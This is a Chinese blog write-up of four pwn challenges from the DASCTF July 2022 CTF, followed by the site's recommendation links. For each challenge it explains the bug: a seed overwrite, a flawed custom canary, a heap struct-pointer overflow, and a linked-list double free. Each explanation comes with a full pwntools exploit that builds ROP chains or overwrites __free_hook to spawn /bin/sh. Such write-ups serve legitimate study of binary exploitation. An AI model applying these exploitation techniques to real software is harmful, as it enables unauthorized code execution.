DASCTF 7月赋能赛pwn wp

已于 2022-07-25 14:37:09 修改
阅读量475 收藏 1
点赞数 1
分类专栏: wp 文章标签: ubuntu linux python
于 2022-07-25 14:37:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/125974657
版权

pwn

eyfor

1

buf可以覆盖seed,覆盖之后直接可以生成随机数。猜数成功之后可以进入一个栈溢出:

程序自带system函数,同时会将payload strcpy到bss段上,因此可以在payload中附带/bin/sh之后直接调用system(“/bin/sh”)

getshell。

exp:

from pwn import *
import ctypes
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
libc_func = ctypes.CDLL('/lib/x86_64-linux-gnu/libc.so.6')
libc_func.srand(10)
sh = process('/mnt/hgfs/ubuntu/das7/pwn4')
sh = remote('node4.buuoj.cn',27445)
sh.sendafter(b'go\n',b'aaa')
for i in range(4):
    sh.sendlineafter(b'message:\n',str(libc_func.rand()).encode())
sh.sendline(str(-1).encode())
pop_rdi  = 0x0000000000400983
# gdb.attach(sh)
payload = b'/bin/sh\x00'+b'a'*0x30+p64(pop_rdi+1)+p64(pop_rdi)+p64(0x6010C0)+p64(0x400680)

sh.sendline(payload)
sh.interactive()

MyCanary2

2

程序自己实现一个canary,canary本身是通过随机数异或而来,不可破解。

不过程序出现了一个逻辑漏洞。

若我们先调用栈溢出之后再调用生成canary则可以直接绕过canary 实现栈溢出。

exp:

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# r  = process('/mnt/hgfs/ubuntu/das7/MyCanary2/MyCanary2')
r  = remote('node4.buuoj.cn',28879)


def menu(choice):
    r.recvuntil(b"Input your choice")
    r.sendline(str(choice))

def gogogo(payload):
    menu(1)
    r.recvuntil(b"Show me the code:")
    r.send(payload)


pop_rdi = 0x0000000000401613
system_addr = 0x401120
payload = b'a'*0x68+p32(0)+p32(0)+p64(0)+p64(pop_rdi+1)+p64(pop_rdi)+p64(0x4020F0)+p64(system_addr)
print(payload)
# gdb.attach(r)
gogogo(payload) 
menu(2)
menu(3)
r.interactive()

compact

程序实现了一个堆菜单:

3

这个程序最特殊的地方就是她的delete和reset是分开的。

delete功能为清空堆块指针。reset会free掉所有执行过delete的堆块。

这个功能很重要。

然后就是这里有一个溢出:

4

当buf为0xff的时候,可以溢出最多的字节覆盖到结构体指针:

5

这道题让我卡了很久是因为idx<=7。不太好填满tcache list然后用fastbin into tcache bin做。

不过用刚才那个delete清空指针和reset配合还是能够做到的,这样之后我发现只能申请0x20大小的堆块,并且申请地址末尾必为tag字段:0xff,我调试了一下malloc_hookfree_hookexit_hook都不在末尾字段为0xff且偏移处于0x20的范围内,同时由于0x20大小是结构体堆块,即使申请过去了,我们的ogg里也必带有一个0xff,所以这种思路是错的。\

我的步骤:

  • 通过以上溢出改结构体指针,free掉一个fake_unsortedbin
  • 再申请一个堆块,改掉结构体指针指向fake_unsortedbin,通过show功能泄露heap基址和libc基址。
  • 伪造一个fake_chunk,free掉0x90大小的fake_chunk后申请回来,改掉一个tcache空闲块的next指针。
  • 然后就打free_hook即可。

(这里其实伪造fake_chunk必须要满足fake_chunk的下一个堆块size合法,并且我感觉也不止会判断这一个,似乎还会一直往下判断下一个堆块size是否合法,因此我最开始没有采用这种方法,不过这道题刚好有一个fake_unsortedbin可以给我们提供合法的size,因此可以伪造fake_chunk

exp:

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# r = process('/mnt/hgfs/ubuntu/das7/compact/compact')
r = remote('node4.buuoj.cn',29237)
libc = ELF('/mnt/hgfs/ubuntu/das7/compact/libc-2.31.so')

def menu(choice):
    r.recvuntil(b"give me your choice: \n")
    r.sendline(str(choice))

def add(content,something):
    menu(1)
    r.recvuntil(b"data: ")
    r.send(content)
    r.recvuntil(b"tag: ")
    r.send(b'\xff')
    # sleep(0.5)
    r.send(something)

def show(index):
    menu(2)
    r.recvuntil(b"idx: ")
    r.sendline(str(index))

def delete(index):
    menu(3)
    r.recvuntil(b"idx: ")
    r.sendline(str(index))

def alldelete():
    menu(4)



[add(p64(0)*3+p64(0x4b1)+p64(0)*3+p64(0x91),b'a') for i in range(8)]
delete(0)
alldelete()
add(b'a',b'aaa\xe0')
delete(0)
alldelete()
add(b'a',b'aaa\xe0')
show(0)
r.recvuntil(b"tag: \xffaaa")
heap_base = u64(r.recv(6).ljust(8,b'\0'))-0x2e0
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))-0x1ebf61
free_hook =  libc_base+libc.sym["__free_hook"]
one_gadget = libc_base+0xe6af1
delete(4)
[delete(k) for k in range(2,4)]
# [add(b'a',b'a') for l in range(6)]#1-6
alldelete()
add(b'a',b'aaa'+p16((heap_base+0x3b0)&0xffff))#2
delete(2)
alldelete()
add(b'a'*0x40+p64(0)+p64(0x21)+p64(heap_base)+p64(heap_base+0x10)+p64(0)+p64(0x91)+p64(free_hook),b'a')#2
add(b'a',b'a')#3
delete(2)
add(p64(one_gadget),b'a')
menu(4)


# gdb.attach(r,'b free')
log.success("heap_base: "+hex(heap_base))
log.success("libc_base: "+hex(libc_base))

r.interactive()

easyheap

赛后由h@x0r师傅提供的思路和exp,经由本人同意后我收集在此。

维护了0x37个双向链表头来管理堆结构

结构如下

struct Node
{
  char name[16];
  char *buf;
  _QWORD prev;
  Node *next;
};

并且通过输入的name来进行一个类似hash的操作得到他在整个链表头数组的索引

def name_hash(name):
    v3 = 0;
    name = name.ljust(16,b'\x00')
    for i in range(16):
        v3 = name[i] + 0x13 * v3;
    return v3 & 0x37

漏洞出在删除逻辑里假设链表头节点的prev是0

但是如果移除该链表头节点后, 这个假设就不成立了

image-20220725140356526

这时候就会走prev->next = tmp这条路径

导致链表头还是原来这个节点, 但是因为他的name字段已经变化, 我们一般来说已经访问不到他了

(所以我fuzz半天没fuzz出来什么洞)

那么现在就有一个double free

来看一下我们其他的函数

add函数

image-20220725140843799

show函数

image-20220725140806538

容易发现name跟buf指针相邻, 可以通过打印name指针泄露一下堆地址

(管他有没有用, 先泄了再说)

然后可以通过填满tcache让0x210的堆块释放到unsortbin里, 然后用show打印free状态下的节点来泄露libc地址

因为是2.31 所以考虑打free_hook写system

注意到dele中

image-20220725141153515

如果我们能完全控制被free节点的内容

我们就可以写入prev->next的值为next指针

那么我们只需要控制prev == free_hook-0x20 next == system_addr buf == bin_sh_addr

就可以一次操作getshell

不难想到在0x210的大堆块中伪造一个0x30的节点

那我们还需要一次fastbin attack来分配到这个0x30的节点

详细操作见exp

from pwn import *

context.log_level = 'debug'
sh  = process('./easyheap')
# sh = remote('node4.buuoj.cn',29160)
def cmd(choice):
    sh.sendlineafter(b'> ',str(choice).encode())

def add(name,content):
    cmd(1)
    if len(name) < 0x10:
        name += b'\n'
    if len(content) < 0x200:
        content += b'\n'
    sh.sendafter(b'name: ',name)
    sh.sendafter(b'content: ',content)
def dele(name):
    cmd(3)
    if len(name) != 0x10:
        name = name.ljust(16,b'\x00')
    sh.sendafter(b'name: ',name)
def show(idx):
    cmd(2)
    sh.sendlineafter(b'idx: ',str(idx).encode())

def name_hash(name):
    v3 = 0;
    name = name.ljust(16,b'\x00')
    for i in range(16):
        v3 = name[i] + 0x13 * v3;
    return v3 & 0x37

add(b'\x00',b'xx')
add(b'\x00',b'xx')
add(b'\xff'*15+b'X',b'xxx')
show(name_hash(b'\xff'*15+b'X'))
sh.recvuntil(b'X')
heap_base = u64(sh.recv(6).ljust(8,b'\x00'))  & -4096
for i in range(6):
    add(b'\x02',b'kk')
for i in range(6):
    dele(b'\x02')
dele(b'\x00')
dele(b'\x00')
success("heap_base : "+hex(heap_base))
show(0)
libc_base = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ecbe0
success("libc_base : "+hex(libc_base))

# for i in range(3):
#     add(b'\x00',b'xxx')
# dele(b'\x00')
bucket = name_hash(p64(heap_base+0x2120))
bucket_name = p64(heap_base+0x2120)
add(bucket_name,b'xxx')
for i in range(8):
    add(b'\x02',b'clear')
add(b'\x02',b'a'*0x20+p64(0)+p64(0x31)+p64(0)*5+p64(0x31))
for i in range(2):
    add(b'\x02',b'clear')
add(bucket_name,b'xxx')
for i in range(5):
    dele(b'\x02')
dele(bucket_name)
dele(bucket_name)
dele(b'\xff'*15+b'X')
add(b'\x07',b'bbb')

success("bucket : "+hex(bucket))

dele(b'\x02')

dele(bucket_name)

fake_chunk = heap_base + 0x1b20

add(p64(fake_chunk),b'qqq')
add(b'\x02',b'kkk')
add(b'\x02',b'kkk')
add(b'\x01',b'kkk')
libc = ELF('./libc.so.6')
libc.address = libc_base
payload = b'\x00'*0x20
payload += p64(0) + p64(0x31)
payload += p64(0x1) + p64(0)
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(libc.sym['__free_hook']-0x20) + p64(libc.sym['system'])
add(b'\x02',payload)
# gdb.attach(sh,'b *$rebase(0xf78)')

dele(b'\x01')

sh.interactive()

有一点坑的是

远程的libc版本实际是2.31 9.9

而附件给出的实际上是2.31 9.7

但是因为泄露是一般是泄露的unsortbin的地址, 而这两个版本的unsortbin的偏移恰好一致

所以很难发现是libc有问题

Loτυs
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DASCTF 7部分pwn
starssgo的博客
07-25 1380
做了pwn1跟pwn3,pwn2没做出来(俺是废物)… pwn1 签到题,但是我们要记住 .text:080485F8 mov eax, 0 .text:080485FD mov ecx, [ebp+var_4] .text:08048600 leave .text:08048601 lea esp, [ecx-4] .text:08048604
DASCTF 6部分pwn wp
starssgo的博客
06-27 1078
感觉质量挺高的,有点昏迷, 目录Memory-Monster-IVoooooordereasyheapspringboardsecret写在最后 Memory-Monster-IV 这个题我是真的服了,恶心了我一天时间,最后还是没出,知道是要改got表,而且每次只能改一个字节,第一次改后变成ret之类的无用函数,我是不想说啥,没复现出来,贴下作者的分析把: http://taqini.space/2020/06/26/DASCTF-June-Memory-Monster-IV-200pt/ 我感觉能学到的东
[DASCTF 2023六挑战赛|二进制专项] 5个pwn
weixin_52640415的博客
06-04 1186
格式化字符串漏洞利用argv链 6次free的off_by_null printf改system
DASCTF 2023六挑战赛|二进制专项 PWN
weixin_51890658的博客
06-05 346
通过ida分析和gdb调试i在rbp-c中,它是int类型占4字节,还有两次格式化字符串漏洞,可通过这两次修改为i的值,第一次是把args参数链修改为i地址,第二次是修改i值即可再次使用格式化字符串漏洞。因为有堆溢出和uaf,可以伪装fastchunk,通过gdb调试0x602095地址的值为0x7f,可伪装。64位,也给了libc库,开了canary和pie地址随机 拖入ida看存在格式化字符串漏洞,有3次。64位的,给了libc库,开了canary,拖入ida分析,在edit函数中存在堆溢出。
DASCTF X GFCTF 2022十挑战赛 - pwn
z1r0的博客
10-28 828
所以思路很好想出来,首先可以利用rax来控制rsi进行read任意写,再利用rax控制rsi到read_got这里进行任意地址写,写成syscall。这个时候我们把rax设置成0x3b也就是execve,控制rdi为bin_sh,把rsi和rdx置为0,最后直接调用read就可以getshell了。发现了这一个gadget,而404018正好是bss的地址,可读可写,所以我们可以利用上面第一次的任意地址写将bss这里的地址写成bin_sh。这里的地方,并且最后还可以控制ret。
2021dasctfpwn题解复现(strdup,md5,protect,setcontext)
weixin_46521144的博客
08-09 870
前言:算是第一次参加自己觉得能力匹配的比赛之前的0ctf,tctf的,感觉自己就像个混子,2021国赛参加的时候全程都在学没学过的堆,所以其实也没觉得自己能力赶得上。然而第一次打比赛嘛,总归是不可能会做的,不过也算是知道了,比赛也没有想象中的那么恐怖。 本篇文章参考的wp https://kr0emer.com/2021/08/04/DASCTF%20July%20X%20CBCTF%204th%20pwn/ Easyheap 保护全开,也开了沙箱,但是同时也开了一块RWX的段,地址是固定的0x233300
信安比赛赋能.nyf
10-13
信安比赛赋能.nyf
5G赋能未来电力发展.pdf
05-19
未来大部分的电力场景将搭建在能源互联网之上,能量像信息一样在网络中随时随地产生和共享,其发展呈现出新的趋势和特征:发电清洁友好,融合多种清洁分布式电源,融合储能和电动汽车,融合分散可靠负荷,具备清洁...
2021人工智能赋能数字水务白皮书.pdf
07-14
2021人工智能赋能数字水务白皮书
数字孪生赋能智慧城市大脑建设方案.pptx
11-08
数字孪生赋能智慧城市大脑建设方案.pptx
2021年度数智化转型咨询赋能白皮书.pdf
01-25
1、2021年度数智化转型咨询赋能白皮书 2、使用/学习目标:了解2021年度数智化转型咨询赋能白皮书 3、应用场景:2021年度数智化转型咨询赋能白皮书 4、特点:2021年度数智化转型咨询赋能白皮书 5、适用人群:数字化...
DASCTF2022.07赋能赛 - Pwn easyheap
qq_34010404的博客
07-25 1565
DASCTF 2022.07赋能赛
DASCTF 2020安恒赛 4 pwn1---echo server题解
qy201706的博客
05-08 1001
学到了利用printf泄露libc,以前都只会puts… 0x1 checksec: 0x2 拖进ida: 显然进入sub_4006A7(): 厉害了自定义写入长度,明显的栈溢出 0x88个’a’可覆盖返回地址: 0x3 无system、’/bin/sh’ 泄露libc来做 0x4 printf泄露地址的详解(选择泄露__libc_start_main): 不知道ROP链怎么写,直接去程序里找汇编代码现学!! 发现程序最后的printf(“hello %s”, &s); 到g
Dasctf 6赛其余pwn WP
qq_31457355的博客
11-01 553
copy: 这题主要是堆风水的利用,通过运行我们可以发现,每次申请块之后都会free掉这个块,但是接下来执行删除操作的时候我们还可以利用这个指针因此存在uaf漏洞,剩下的就是堆风水的利用了,不再赘述 exp: #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import os from pwn import * #from LibcSearcher import LibcSearcher # context.log_level = 'debu
2021NepCTF REVERSE-Hardcsharp Writeup
Nu1bzzi的博客
03-22 384
2021NepCTF REVERSE-Hardcsharp 首先拿到文件第一步用PEiD查壳(养成好习惯) 什么都没找到QAQ,萌新只知道是32位的程序于是顺手放进IDA进行分析 在放入时发现该程序是由.NET做的 进入后点进jmp后的函数果然发现了熟悉的东西 直接放入Dnspy中进行分析(Dnspy的详细使用方法和下载地址在这里????QAQ) 一个个点开之后发现我们要分析的主要函数在@02000002中 而我们需要注意的是这部分的运算 由for循环函数可知array[]数组中每一项都与51做了
2021DASCTF July X CBCTF pwn wp
qq_39948058的博客
08-26 278
此题是7末的比赛,本人旧博客搬到新博客啦,各位见谅哈(实际就是没钱租用服务器啦呜呜) **EasyHeap wp: Edit有堆溢出,有沙箱,禁用了execute,freehook为setcontext+5361即可,尝试orw就行了。写shellcode到hook,赋予权限即可,** exp: from pwn import * context(os='linux',arch='amd64',log_level='debug') p=process('./Easyheap') p=rem
DASCTF2020-7赛 部分wp(misc,pwn,crypto)
ATFWUS的博客
07-25 1918
五个小时,刚好把杂项,密码学,pwn的签到题做出来了,哈哈哈,wp记录一下。 比赛时间:2020-07-25 10:00-15:00 0x01.MISC - welcome to the misc world 文件下载 :链接:https://pan.baidu.com/s/1QfoFQUORH5n0zTEdHNXiAw 提取码:FWUS 考点: 1.lsb隐写与zsteg的使用 2.Nfts隐写 3.base85加密 下载得到的是一个rar文件。 解压的得到一张图片和一个压缩包,压缩包.
pwnDASCTF Sept 九
woodwhale的博客
09-26 3675
pwnDASCTF Sept 赛 1、hehepwn 先查看保护,栈可执行,想到shellcode 这题需要注意shellcode的写法 拖入ida中分析 一直以为iso scanf不能栈溢出,后来发现我是shabi 先进入sub_4007F9()函数 有个read函数,恰好读完s数组,由于printf是碰到\x00截断,所以如果我们输满0x20个padding就可以读取一个栈地址 我们可以把shellcode写入scanf输入的地址中,通过创建fake rbp进行栈迁移,而这个栈中存有我们写入
第十四届全国大学生信息安全竞赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-16 1万+
第十四届全国大学生信息安全竞赛
chat gpt 赋能科研
最新发布
03-04
C知道是一个类ChatGPT的AI助手,可以为科研提供一些赋能。它可以回答关于科研的问题,提供相关的知识和信息,并帮助解决一些科研中的难题。以下是一些C知道可以为科研提供的赋能: 1. 提供学术资源:C知道可以帮助查找和提供学术论文、研究报告、学术会议等相关资源,帮助科研人员快速获取所需的文献资料。 2. 解答科研问题:C知道可以回答关于科研方法、实验设计、数据分析等方面的问题,提供专业的指导和建议。 3. 推荐研究领域:C知道可以根据用户的兴趣和背景,推荐一些热门的研究领域或者具有潜力的新兴领域,帮助科研人员选择合适的研究方向。 4. 辅助文献写作:C知道可以提供写作方面的建议和指导,包括论文结构、段落组织、语言表达等方面的技巧,帮助科研人员提高论文质量。 5. 数据分析支持:C知道可以提供一些数据分析的方法和工具,帮助科研人员处理和分析实验数据,提取有用的信息。 6. 科研趋势预测:C知道可以根据大数据分析和机器学习算法,预测一些科研领域的发展趋势,帮助科研人员做出科学决策。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值